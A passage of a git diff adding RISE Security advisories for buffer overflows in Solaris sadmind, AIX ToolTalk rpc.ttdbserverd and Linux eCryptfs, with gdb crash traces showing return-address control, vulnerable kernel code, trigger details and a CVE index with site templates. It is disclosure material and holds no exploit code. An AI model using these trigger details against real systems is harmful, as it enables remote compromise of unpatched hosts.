perform distributed system administration +operations. + +The sadmind daemon is started automatically by the inetd daemon whenever a +request to invoke an operation is received. The sadmind daemon process +continues to run for 15 minutes after the last request is completed, unless a +different idle-time is specified with the -i command line option. The sadmind +daemon may be started independently from the command line, for example, at +system boot time. In this case, the -i option has no effect; sadmind continues +to run, even if there are no active requests. + +The vulnerable function adm_build_path() does does not validate user supplied +data when appending it to a stack-based buffer using strcat(), resulting in a +stack-based buffer overflow. The exploitation of this vulnerability is trivial +and results in remote compromise of the vulnerable system. +This is the debug information about this vulnerability (from Sun Solaris 9 x86). + + +Breakpoint 1, 0xd330e5b0 in adm_build_path () + from /usr/snadm/lib/libadmapm.so.2 +(gdb) until *adm_build_path+38 +0xd330e5c6 in adm_build_path () from /usr/snadm/lib/libadmapm.so.2 +(gdb) x/i $pc +0xd330e5c6 : call 0xd3304fa8 +(gdb) x/x $esp+4 +0x80411e4: 0x080b7cd0 +(gdb) x/x $esp +0x80411e0: 0x08041208 +(gdb) x/s 0x080b7cd0 +0x80b7cd0: 'A' ... +(gdb) x/s 0x08041208 +0x8041208: "system.2.1/" +(gdb) where +#0 0xd330e5c6 in adm_build_path () from /usr/snadm/lib/libadmapm.so.2 +#1 0xd330eaa7 in adm_find_method () from /usr/snadm/lib/libadmapm.so.2 +#2 0xd335326b in verify_vers_1 () from /usr/snadm/lib/libadmagt.so.2 +#3 0xd3352e88 in verify_validate () from /usr/snadm/lib/libadmagt.so.2 +#4 0xd3352cf8 in amsl_verify () from /usr/snadm/lib/libadmagt.so.2 +#5 0xd32c8a85 in __0fQNetmgtDispatcherPdispatchRequestP6Hsvc_reqP6J__svcxprt + () from /usr/snadm/lib/libadmcom.so.2 +#6 0xd32c8656 in __0fQNetmgtDispatcherOreceiveRequestP6Hsvc_reqP6J__svcxprt () + from /usr/snadm/lib/libadmcom.so.2 +#7 0xd32c837c in _netmgt_receiveRequest () from /usr/snadm/lib/libadmcom.so.2 +#8 0xd311d4a3 in _svc_prog_dispatch () from /usr/lib/libnsl.so.1 +#9 0xd311d24e in svc_getreq_common () from /usr/lib/libnsl.so.1 +#10 0xd311d130 in svc_getreq_poll () from /usr/lib/libnsl.so.1 +#11 0xd3121550 in _svc_run () from /usr/lib/libnsl.so.1 +#12 0xd3121293 in svc_run () from /usr/lib/libnsl.so.1 +#13 0xd32cd165 in __0fQNetmgtDispatcherNstartupServerv () + from /usr/snadm/lib/libadmcom.so.2 +#14 0xd32cd13b in netmgt_start_agent () from /usr/snadm/lib/libadmcom.so.2 +#15 0x0805168f in main () +(gdb) stepi +0xd3304fa8 in strcat@plt () from /usr/snadm/lib/libadmapm.so.2 +(gdb) step +Single stepping until exit from function strcat@plt, +which has no line number information. +0xd330e5cb in adm_build_path () from /usr/snadm/lib/libadmapm.so.2 +(gdb) x/i $pc +0xd330e5cb : add $0x8,%esp +(gdb) where +#0 0xd330e5cb in adm_build_path () from /usr/snadm/lib/libadmapm.so.2 +#1 0xd330eaa7 in adm_find_method () from /usr/snadm/lib/libadmapm.so.2 +#2 0xaabbccdd in ?? () +#3 0x08063000 in ?? () +#4 0x08063128 in ?? () +#5 0x080b7cd0 in ?? () +#6 0x08041730 in ?? () +#7 0x00000400 in ?? () +#8 0x00000001 in ?? () +#9 0xd336ac8c in ?? () from /usr/snadm/lib/libadmagt.so.2 +#10 0x00000000 in ?? () +(gdb) c +Continuing. + +Breakpoint 1, 0xd330e5b0 in adm_build_path () + from /usr/snadm/lib/libadmapm.so.2 +(gdb) c +Continuing. + +Program received signal SIGSEGV, Segmentation fault. +0xaabbccdd in ?? () +(gdb) + + +A proof of concept code for this vulnerability can be downloaded from our +website http://risesecurity.org/. + +VENDOR + +Sun has released patches for this vulnerability, the Sun Alert ID is 245806 +and it is available at the following URL: +http://sunsolve.sun.com/search/document.do?assetkey=1-66-245806-1 + +CREDITS + +This vulnerability was discovered by Adriano Lima . + +DISCLAIMER + +The authors reserve the right not to be responsible for the topicality, +correctness, completeness or quality of the information provided in this +document. Liability claims regarding damage caused by the use of any +information provided, including any kind of information which is incomplete or +incorrect, will therefore be rejected. + +$Id: RISE-2008001.txt 3 2008-11-17 01:45:31Z ramon $ diff --git a/RISE-2009001.txt b/RISE-2009001.txt new file mode 100644 index 0000000..a3bd9f7 --- /dev/null +++ b/RISE-2009001.txt @@ -0,0 +1,138 @@ +RISE-2009001 +ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow Vulnerability + +http://risesecurity.org/advisories/RISE-2009001.txt +Published: June 19, 2009 +Updated: June 19, 2009 + +INTRODUCTION + +There exists a vulnerability within a function of the ToolTalk database server +(rpc.ttdbserverd), which when properly exploited can lead to remote compromise +of the vulnerable system. +This vulnerability was confirmed by us in the following versions of operating +systems, other operating systems and versions may be also affected. + +IBM AIX Version 6.1.3 +IBM AIX Version 6.1.2 +IBM AIX Version 6.1.1 +IBM AIX Version 6.1.0 +IBM AIX Version 5.3.10 +IBM AIX Version 5.3.9 +IBM AIX Version 5.3.8 +IBM AIX Version 5.3.7 +IBM AIX Version 5.3.0 +IBM AIX Version 5.2.0 +IBM AIX Version 5.1.0 + +To determine whether the ToolTalk database server is running on a host, use the +"rpcinfo" command to print a list of the RPC services running on it, as: + +$ rpcinfo -p hostname + +The remote program number for the ToolTalk database server is 100083. If an +entry exists for this program, then the ToolTalk database server is running on +the system. + + 100083 1 tcp 32768 ttdbserver + +DETAILS + +As computer users increasingly demand that independently developed applications +work together, inter-operability is becoming an important theme for software +developers. By cooperatively using each other's facilities, inter-operating +applications offer users capabilities that would be difficult to provide in a +single application. The ToolTalk service is designed to facilitate the +development of inter-operating applications that serve individuals and work +groups. + +The following ToolTalk service components work together to provide +inter-application communication and object information management: + + * ttsession is the ToolTalk communication process. + + This process joins together senders and receivers that are either using the + same X server or interested in the same file. One ttsession communicates + with other ttsessions when a message needs to be delivered to an application + in another session. + + * rpc.ttdbserverd is the ToolTalk database server process. + + One rpc.ttdbserverd is installed on each machine which contains a disk + partition that stores files of interest to ToolTalk clients or files that + contain ToolTalk objects. + + File and ToolTalk object information is stored in a records database managed + by rpc.ttdbserverd. + + * libtt is the ToolTalk application programming interface (API) library. + + Applications include the API library in their program and call the ToolTalk + functions in the library. + +The ToolTalk service uses the Remote Procedure Call (RPC) to communicate between +these ToolTalk components. + +Applications provide the ToolTalk service with process and object type +information. This information is stored in an XDR format file, which is referred +to as the ToolTalk Types Database in this manual. + +The vulnerable function _tt_internal_realpath() does not validate user supplied +data when copying it to a stack-based buffer using strcpy(), resulting in a +stack-based buffer overflow. The exploitation of this vulnerability is trivial +and results in remote compromise of the vulnerable system. + +This vulnerability can be triggered by calling remote procedure 15 of ToolTalk +database server with a large XDR-encoded ASCII string as its argument. + + +Breakpoint 1, 0xd37b2200 in _tt_internal_realpath () from +/usr/lib/libtt.a(shr.o) +(gdb) where +#0 0xd37b2200 in _tt_internal_realpath () from /usr/lib/libtt.a(shr.o) +#1 0xd37af9f0 in _tt_get_realpath__FPcT1 () from /usr/lib/libtt.a(shr.o) +#2 0xd37b00b4 in _tt_realpath () from /usr/lib/libtt.a(shr.o) +#3 0xd37b287c in _Tt_file_system::bestMatchToPath () from +/usr/lib/libtt.a(shr.o) +#4 0x1001ca50 in ?? () +... +(gdb) stepi +0xd37b2240 in _tt_internal_realpath () from /usr/lib/libtt.a(shr.o) +(gdb) x/i $pc +0xd37b2240: bl 0xd3793080 +(gdb) x/s $r4 +0x200aa4a8: "/hom\e/root/", 'A' ... +(gdb) stepi +0xd3793080 in strcpy () from /usr/lib/libtt.a(shr.o) +(gdb) step +Single stepping until exit from function strcpy, +which has no line number information. +0xd37b2244 in _tt_internal_realpath () from /usr/lib/libtt.a(shr.o) +(gdb) where +#0 0xd37b2244 in _tt_internal_realpath () from /usr/lib/libtt.a(shr.o) +#1 0xaabbccdd in ?? () +(gdb) + + +A proof of concept code for this vulnerability can be downloaded from our +website at http://risesecurity.org/. + +VENDOR + +IBM has released advisory and fixes for this vulnerability: +http://aix.software.ibm.com/aix/efixes/security/libtt_advisory.asc +http://aix.software.ibm.com/aix/efixes/security/libtt_fix.tar + +CREDITS + +This vulnerability was discovered by Adriano Lima and +Ramon de Carvalho Valle . + +DISCLAIMER + +The authors reserve the right not to be responsible for the topicality, +correctness, completeness or quality of the information provided in this +document. Liability claims regarding damage caused by the use of any information +provided, including any kind of information which is incomplete or incorrect, +will therefore be rejected. + diff --git a/RISE-2009002.txt b/RISE-2009002.txt new file mode 100644 index 0000000..7ac319a --- /dev/null +++ b/RISE-2009002.txt @@ -0,0 +1,101 @@ +RISE-2009002 +Linux eCryptfs parse_tag_11_packet Literal Data Buffer Overflow Vulnerability + +http://risesecurity.org/advisories/RISE-2009002.txt +Published: July 28, 2009 +Updated: July 28, 2009 + +INTRODUCTION + +There exists a vulnerability within a function of Linux eCryptfs (Enterprise +Cryptographic Filesystem), which when properly exploited can lead to +compromise of the vulnerable system. This vulnerability was confirmed by us in +the Linux kernel version 2.6.30.3. Linux kernel versions 2.6.19 and later have +eCryptfs support and may be also affected. + +DETAILS + +eCryptfs is a POSIX-compliant enterprise-class stacked cryptographic +filesystem for Linux. + +It is derived from Erez Zadok's Cryptfs, implemented through the FiST +framework for generating stacked filesystems. eCryptfs extends Cryptfs to +provide advanced key management and policy features. eCryptfs stores +cryptographic metadata in the header of each file written, so that encrypted +files can be copied between hosts; the file will be decryptable with the +proper key, and there is no need to keep track of any additional information +aside from what is already in the encrypted file itself. Think of eCryptfs as +a sort of ``gnupgfs.'' + +The parse_tag_11_packet function of eCryptfs in-kernel key management code +does not check if the tag 11 packet contains a literal data size +(tag11_contents_size) larger than literal data maximum size +(max_contents_bytes), before copying the literal data contents to a +stack-based buffer (of ECRYPTFS_SIG_SIZE size) passed by +ecryptfs_parse_packet_set function as the contents parameter, resulting in a +kernel stack-based buffer overflow vulnerability. + +fs/ecryptfs/keystore.c +-- +static int +parse_tag_11_packet(unsigned char *data, unsigned char *contents, + size_t max_contents_bytes, size_t *tag_11_contents_size, + size_t *packet_size, size_t max_packet_size) +{ + size_t body_size; + size_t length_size; + int rc = 0; + + ... + + rc = ecryptfs_parse_packet_length(&data[(*packet_size)], &body_size, + &length_size); + if (rc) { + printk(KERN_WARNING "Invalid tag 11 packet format\n"); + goto out; + } + if (body_size < 14) { + printk(KERN_WARNING "Invalid body size ([%td])\n", body_size); + rc = -EINVAL; + goto out; + } + (*packet_size) += length_size; + (*tag_11_contents_size) = (body_size - 14); + if (unlikely((*packet_size) + body_size + 1 > max_packet_size)) { + printk(KERN_ERR "Packet size exceeds max\n"); + rc = -EINVAL; + goto out; + } + if (data[(*packet_size)++] != 0x62) { + printk(KERN_WARNING "Unrecognizable packet\n"); + rc = -EINVAL; + goto out; + } + + ... + + (*packet_size) += 12; /* Ignore filename and modification date */ + memcpy(contents, &data[(*packet_size)], (*tag_11_contents_size)); + (*packet_size) += (*tag_11_contents_size); + + ... +-- + +VENDOR + +A patch for this vulnerability was sent to the Linux kernel mailing list by +Tyler Hicks . + +CREDITS + +This vulnerability was discovered by Ramon de Carvalho Valle +. + +DISCLAIMER + +The authors reserve the right not to be responsible for the topicality, +correctness, completeness or quality of the information provided in this +document. Liability claims regarding damage caused by the use of any +information provided, including any kind of information which is incomplete or +incorrect, will therefore be rejected. + diff --git a/RISE-2009003.txt b/RISE-2009003.txt new file mode 100644 index 0000000..d48815e --- /dev/null +++ b/RISE-2009003.txt @@ -0,0 +1,112 @@ +RISE-2009003 +Linux eCryptfs parse_tag_3_packet Encrypted Key Buffer Overflow Vulnerability + +http://risesecurity.org/advisories/RISE-2009003.txt +Published: July 28, 2009 +Updated: July 28, 2009 + +INTRODUCTION + +There exists a vulnerability within a function of Linux eCryptfs (Enterprise +Cryptographic Filesystem), which when properly exploited can lead to +compromise of the vulnerable system. This vulnerability was confirmed by us in +the Linux kernel version 2.6.30.3. Linux kernel versions 2.6.19 and later have +eCryptfs support and may be also affected. + +DETAILS + +eCryptfs is a POSIX-compliant enterprise-class stacked cryptographic +filesystem for Linux. + +It is derived from Erez Zadok's Cryptfs, implemented through the FiST +framework for generating stacked filesystems. eCryptfs extends Cryptfs to +provide advanced key management and policy features. eCryptfs stores +cryptographic metadata in the header of each file written, so that encrypted +files can be copied between hosts; the file will be decryptable with the +proper key, and there is no need to keep track of any additional information +aside from what is already in the encrypted file itself. Think of eCryptfs as +a sort of ``gnupgfs.'' + +The parse_tag_3_packet function of eCryptfs in-kernel key management code does +not check if the tag 3 packet contains a encrypted key size larger than +ECRYPTFS_MAX_ENCRYPTED_KEY_BYTES, before copying the encrypted key to the +new_auth_tok structure, resulting in a kernel heap-based buffer overflow +vulnerability. + +fs/ecryptfs/keystore.c +-- +static int +parse_tag_3_packet(struct ecryptfs_crypt_stat *crypt_stat, + unsigned char *data, struct list_head *auth_tok_list, + struct ecryptfs_auth_tok **new_auth_tok, + size_t *packet_size, size_t max_packet_size) +{ + size_t body_size; + struct ecryptfs_auth_tok_list_item *auth_tok_list_item; + size_t length_size; + int rc = 0; + + ... + + /* Released: wipe_auth_tok_list called in ecryptfs_parse_packet_set or + * at end of function upon failure */ + auth_tok_list_item = + kmem_cache_zalloc(ecryptfs_auth_tok_list_item_cache, GFP_KERNEL); + if (!auth_tok_list_item) { + printk(KERN_ERR "Unable to allocate memory\n"); + rc = -ENOMEM; + goto out; + } + (*new_auth_tok) = &auth_tok_list_item->auth_tok; + rc = ecryptfs_parse_packet_length(&data[(*packet_size)], &body_size, + &length_size); + if (rc) { + printk(KERN_WARNING "Error parsing packet length; rc = [%d]\n", + rc); + goto out_free; + } + + ... + + (*new_auth_tok)->session_key.encrypted_key_size = + (body_size - (ECRYPTFS_SALT_SIZE + 5)); + if (unlikely(data[(*packet_size)++] != 0x04)) { + printk(KERN_WARNING "Unknown version number [%d]\n", + data[(*packet_size) - 1]); + rc = -EINVAL; + goto out_free; + } + + ... + + /* Friendly reminder: + * (*new_auth_tok)->session_key.encrypted_key_size = + * (body_size - (ECRYPTFS_SALT_SIZE + 5)); */ + memcpy((*new_auth_tok)->session_key.encrypted_key, + &data[(*packet_size)], + (*new_auth_tok)->session_key.encrypted_key_size); + (*packet_size) += + (*new_auth_tok)->session_key.encrypted_key_size; + + ... +-- + +VENDOR + +A patch for this vulnerability was sent to the Linux kernel mailing list by +Ramon de Carvalho Valle and Tyler Hicks +. + +CREDITS + +This vulnerability was discovered by Ramon de Carvalho Valle +. + +DISCLAIMER + +The authors reserve the right not to be responsible for the topicality, +correctness, completeness or quality of the information provided in this +document. Liability claims regarding damage caused by the use of any +information provided, including any kind of information which is incomplete or +incorrect, will therefore be rejected. + diff --git a/_data/advisories.yml b/_data/advisories.yml new file mode 100644 index 0000000..7c387b1 --- /dev/null +++ b/_data/advisories.yml @@ -0,0 +1,142 @@ +--- +- description: Heap-based buffer overflow in the parse_tag_3_packet function in fs/ecryptfs/keystore.c + in the eCryptfs subsystem in the Linux kernel before 2.6.30.4 allows local users + to cause a denial of service (system crash) or possibly gain privileges via vectors + involving a crafted eCryptfs file, related to a large encrypted key size in a + Tag 3 packet. + filename: RISE-2009003.txt + name: "[RISE-2009003] Linux eCryptfs parse_tag_3_packet Encrypted Key Buffer Overflow + Vulnerability" + published: 2009-07-28 00:00:00.000000000 -07:00 + resources: + - name: View on LWN.net + url: https://lwn.net/Articles/343906/ + updated: + url: https://github.com/risesecurity/advisories/raw/HEAD/RISE-2009003.txt + vulnerabilities: + - CVE-2009-2407 +- description: Stack-based buffer overflow in the parse_tag_11_packet function in + fs/ecryptfs/keystore.c in the eCryptfs subsystem in the Linux kernel before 2.6.30.4 + allows local users to cause a denial of service (system crash) or possibly gain + privileges via vectors involving a crafted eCryptfs file, related to not ensuring + that the key signature length in a Tag 11 packet is compatible with the key signature + buffer size. + filename: RISE-2009002.txt + name: "[RISE-2009002] Linux eCryptfs parse_tag_11_packet Literal Data Buffer Overflow + Vulnerability" + published: 2009-07-28 00:00:00.000000000 -07:00 + resources: + - name: View on LWN.net + url: https://lwn.net/Articles/343906/ + updated: + url: https://github.com/risesecurity/advisories/raw/HEAD/RISE-2009002.txt + vulnerabilities: + - CVE-2009-2406 +- description: Stack-based buffer overflow in the _tt_internal_realpath function in + the ToolTalk library (libtt.a) in IBM AIX 5.2.0, 5.3.0, 5.3.7 through 5.3.10, + and 6.1.0 through 6.1.3, when the rpc.ttdbserver daemon is enabled in /etc/inetd.conf, + allows remote attackers to execute arbitrary code via a long XDR-encoded ASCII + string to remote procedure 15. + filename: RISE-2009001.txt + name: "[RISE-2009001] ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow + Vulnerability" + published: 2009-06-19 00:00:00.000000000 -07:00 + updated: + url: https://github.com/risesecurity/advisories/raw/HEAD/RISE-2009001.txt + vulnerabilities: + - CVE-2009-2727 +- description: Stack-based buffer overflow in the adm_build_path function in sadmind + in Sun Solstice AdminSuite on Solaris 8 and 9 allows remote attackers to execute + arbitrary code via a crafted request. + filename: RISE-2008001.txt + name: "[RISE-2008001] Sun Solstice AdminSuite sadmind adm_build_path() Buffer Overflow + Vulnerability" + published: 2008-10-14 00:00:00.000000000 -07:00 + updated: 2008-11-16 00:00:00.000000000 -07:00 + url: https://github.com/risesecurity/advisories/raw/HEAD/RISE-2008001.txt + vulnerabilities: + - CVE-2008-4556 +- description: Integer overflow in the kernel in Apple Mac OS X 10.4 through 10.4.10 + allows local users to execute arbitrary code via a large num_sels argument to + the i386_set_ldt system call. + filename: RISE-2007004.txt + name: "[RISE-2007004] Apple Mac OS X 10.4.x Kernel i386_set_ldt() Integer Overflow + Vulnerability" + published: 2007-11-16 00:00:00.000000000 -08:00 + updated: + url: https://github.com/risesecurity/advisories/raw/HEAD/RISE-2007004.txt + vulnerabilities: + - CVE-2007-4684 +- description: Multiple stack-based buffer overflows in Firebird LI 1.5.3.4870 and + 1.5.4.4910, and WI 1.5.3.4870 and 1.5.4.4910, allow remote attackers to execute + arbitrary code via (1) a long service attach request on TCP port 3050 to the SVC_attach + function or (2) unspecified vectors involving the INET_connect function. Multiple + stack-based buffer overflows in Firebird LI 2.0.0.12748 and 2.0.1.12855, and WI + 2.0.0.12748 and 2.0.1.12855, allow remote attackers to execute arbitrary code + via (1) a long attach request on TCP port 3050 to the isc_attach_database function + or (2) a long create request on TCP port 3050 to the isc_create_database function. + filename: RISE-2007003.txt + name: "[RISE-2007003] Firebird Relational Database Multiple Buffer Overflow Vulnerabilities" + published: 2007-10-03 00:00:00.000000000 -07:00 + updated: + url: https://github.com/risesecurity/advisories/raw/HEAD/RISE-2007003.txt + vulnerabilities: + - CVE-2007-5245 + - CVE-2007-5246 +- description: Multiple stack-based buffer overflows in Borland InterBase LI 8.0.0.53 + through 8.1.0.253, and WI 5.1.1.680 through 8.1.0.257, allow remote attackers + to execute arbitrary code via (1) a long service attach request on TCP port 3050 + to the (a) SVC_attach or (b) INET_connect function, (2) a long create request + on TCP port 3050 to the (c) isc_create_database or (d) jrd8_create_database function, + (3) a long attach request on TCP port 3050 to the (e) isc_attach_database or (f) + PWD_db_aliased function, or unspecified vectors involving the (4) jrd8_attach_database + or (5) expand_filename2 function. Stack-based buffer overflow in Borland InterBase + LI 8.0.0.53 through 8.1.0.253 on Linux, and possibly unspecified versions on Solaris, + allows remote attackers to execute arbitrary code via a long attach request on + TCP port 3050 to the open_marker_file function. + filename: RISE-2007002.txt + name: "[RISE-2007002] Borland InterBase Multiple Buffer Overflow Vulnerabilities" + published: 2007-10-03 00:00:00.000000000 -07:00 + updated: + url: https://github.com/risesecurity/advisories/raw/HEAD/RISE-2007002.txt + vulnerabilities: + - CVE-2007-5243 + - CVE-2007-5244 +- description: The shared_region_map_file_np function in Apple Mac OS X 10.4.8 and + earlier kernel allows local users to cause a denial of service (memory corruption) + via a large mappingCount value. + filename: RISE-2007001.txt + name: "[RISE-2007001] Apple Mac OS X 10.4.x Kernel shared_region_map_file_np() Memory + Corruption" + published: 2007-01-19 00:00:00.000000000 -08:00 + updated: + url: https://github.com/risesecurity/advisories/raw/HEAD/RISE-2007001.txt + vulnerabilities: + - CVE-2007-0430 +- description: Integer overflow vulnerability in the i386_set_ldt call in FreeBSD + 5.5, and possibly earlier versions down to 5.2, allows local users to cause a + denial of service (crash) and possibly execute arbitrary code via unspecified + vectors, a different vulnerability than CVE-2006-4178. Integer signedness error + in the i386_set_ldt call in FreeBSD 5.5, and possibly earlier versions down to + 5.2, allows local users to cause a denial of service (crash) via unspecified arguments + that use negative signed integers to cause the bzero function to be called with + a large length parameter, a different vulnerability than CVE-2006-4172. + filename: RISE-2006002.txt + name: "[RISE-2006002] FreeBSD 5.x Kernel i386_set_ldt() Integer Overflow Vulnerability" + published: 2006-09-23 00:00:00.000000000 -07:00 + updated: + url: https://github.com/risesecurity/advisories/raw/HEAD/RISE-2006002.txt + vulnerabilities: + - CVE-2006-4172 + - CVE-2006-4178 +- description: Buffer overflow in the Strcmp function in the XKEYBOARD extension in + X Window System X11R6.4 and earlier, as used in SCO UnixWare 7.1.3 and Sun Solaris + 8 through 10, allows local users to gain privileges via a long _XKB_CHARSET environment + variable value. + filename: RISE-2006001.txt + name: "[RISE-2006001] X11R6 XKEYBOARD Extension Strcmp() Buffer Overflow Vulnerability" + published: 2006-09-07 00:00:00.000000000 -07:00 + updated: + url: https://github.com/risesecurity/advisories/raw/HEAD/RISE-2006001.txt + vulnerabilities: + - CVE-2006-4655 diff --git a/templates/README.md.liquid b/templates/README.md.liquid new file mode 100644 index 0000000..b72ecc4 --- /dev/null +++ b/templates/README.md.liquid @@ -0,0 +1,11 @@ +--- +permalink: README.md +--- + +Advisories +========== + +{% for advisory in site.data.advisories %} +* [{{ advisory.name }}]({{ advisory.url }}) + {{ advisory.description }} +{% endfor %} diff --git a/templates/advisories.csv.liquid b/templates/advisories.csv.liquid new file mode 100644 index 0000000..3fb4fa8 --- /dev/null +++ b/templates/advisories.csv.liquid @@ -0,0 +1,8 @@ +--- +permalink: advisories.csv +--- + +name,published,updated,url +{%- for advisory in site.data.advisories %} +{{ advisory.name }},{{ advisory.published | date: "%F" }},{{ advisory.updated | date: "%F" }},{{ advisory.url }} +{%- endfor %} diff --git a/templates/advisories.html.liquid b/templates/advisories.html.liquid new file mode 100644 index 0000000..0902f01 --- /dev/null +++ b/templates/advisories.html.liquid @@ -0,0 +1,26 @@ +--- +permalink: advisories.html +--- + + + + + + + + + + + + + + + {%- for advisory in site.data.advisories %} + + + + + + {%- endfor %} + +
NamePublishedUpdated
{{ advisory.name }}{{ advisory.published | date: "%F" }}{{ advisory.updated | date: "%F" }}
diff --git a/templates/advisories.json.liquid b/templates/advisories.json.liquid new file mode 100644 index 0000000..559892f --- /dev/null +++ b/templates/advisories.json.liquid @@ -0,0 +1,14 @@ +--- +permalink: advisories.json +--- + +[ +{%- for advisory in site.data.advisories %} + { + "name": "{{ advisory.name }}", + "published": "{{ advisory.published | date: "%F" }}", + "updated": "{{ advisory.updated | date: "%F" }}", + "url": "{{ advisory.url }}" + }, +{%- endfor %} +] diff --git a/templates/advisories.yml.liquid b/templates/advisories.yml.liquid new file mode 100644 index 0000000..2e4a356 --- /dev/null +++ b/templates/advisories.yml.liquid @@ -0,0 +1,11 @@ +--- +permalink: advisories.yml +--- + +--- +{%- for advisory in site.data.advisories %} +- name: {{ advisory.name }} + published: {{ advisory.published | date: "%F" }} + updated: {{ advisory.updated | date: "%F" }} + url: {{ advisory.url }} +{%- endfor %}